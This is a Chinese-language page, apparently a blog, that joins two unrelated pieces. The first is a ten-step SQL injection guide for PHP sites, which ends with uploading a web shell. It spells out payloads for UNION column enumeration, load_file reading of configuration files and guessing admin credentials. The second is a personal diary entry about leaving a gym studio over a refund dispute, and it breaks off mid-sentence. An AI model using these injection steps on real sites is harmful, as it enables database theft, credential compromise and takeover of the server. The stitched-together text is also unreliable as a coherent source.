Poison

  通常PHP注入的步骤如下： 1）先查看是否存在漏洞。 2）判断版本号以决定是否可以用union连接，and ord(mid(version(),1,1))>51。 3）利用order by 暴字段，在网址后加 order by 10，如果返回正常说明字段大于10。 4）再利用union来查询准确字段，如: and 1=2 union select 1,2,3,.......直到返回正常，说明猜到准确字段数。如过滤了空格可以用'/**/'代替。 5）判断数据库连接帐号有没有写权限，and (select count(*) from mysql.user)>0，如果结果返回错误，那我们只能猜解管理员帐号和密码了。 6）如果返回正常，则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值，用逗号隔开)),8,9,10 ，load_file(char(文件路径的ascii值，用逗号隔开))也可以用十六进制，通过这种方式读取配置文件，找到数据库连接等。 7）首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user，如果返回正常，说明存在这个表。 8）知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user，如果在2字段显示出字段内容则存在些字段。 9）同理再猜解password字段,猜解成功再找后台登录。 10）登录后台，上传shell

2020年8月3日，告别了Gravity健身工作室，选择了Super工作室。自2013年一直跟着戴教练，跟着他总金仕堡到尚为，再到他自己创办的Gravity，终难逃脱七年之痒的咒怨。 出于对戴教练教学水平的认可，七年里给戴教练介绍了一些需要健身小伙伴，小伙伴又介绍自己的小伙伴，再加通过健身认识并仍然跟着戴教练加入Gravity的大概有30多人。这次离开首批有8人，最终可能会有十多人。 这次事件的起因是两件小事。一件是因为标签的事，戴在没有通知我们的情况下，在工作室内多处贴了“NO EATING OR DRINKING”的标签。由于我们是中午去健身，经常在那边吃饭，因此顾老师觉得被针对了，非常愤怒。我虽然经常在工作室各处吃东西，但当时确实没啥感觉。顾老师在晚上和戴面谈后虽有缓和但仍然很生气，表示不会再去宏辉点，只去花漾城的店。这让我感觉有点难受，如果再也看不到顾老师的话。 另一件小事是因为上课迟到。标签的事没过多久，周五中午上bp，我、方、井、沙迟到了。我们一直记得是12:30开始，以往也一直是这个点开始，但app上约课是12:15。虽然以往也是12:15，但戴往往会等到12:30人齐再开始。我们那天下班较迟，走的时候已经12点多了，到工作室也大约12点20了。看到bp已经开始的时候，我们感觉很惊讶，也感觉很尴尬。井老师上了几分钟就出去了。这件事成为离开Gravity的导火索，因为紧接着方和我也就跟出去了，并在隔壁地平线讨论了一下之后该怎么办。在他们表示要离开后，我也表示了支持。 在确认退出后，戴扣除了充值赠送和刷卡手续费。我还剩16000+，扣除了我6000+的费用。看到这种扣法，以及3万的课时费在扣除充值赠送的3500元后，还剩460元的情况下还要扣148的刷卡手续费，最终只退312元，我知道和他的关系已经彻底划上了句号。 其实从当初的认可到放弃7年的合作，显然不是因为一两件小事。从教学水平到为人都是我选择离开的原因。 教学 戴在最初确实给与我不少帮助，最初的改变也确实比较大，身边人看到我的改变也跟着找了他。但他给我的训练计划一直没有分化训练，这让我很困惑，我在金仕堡的时候就问过他这个问题。他讲了他的理论，并说放心交给他。基于之前的变化，我也就放心交给他了。但结果从金仕堡到尚为，再到Gravity，一直是这样的训练方式，虽然细节变化很多，但从来没有分化训练过。一次...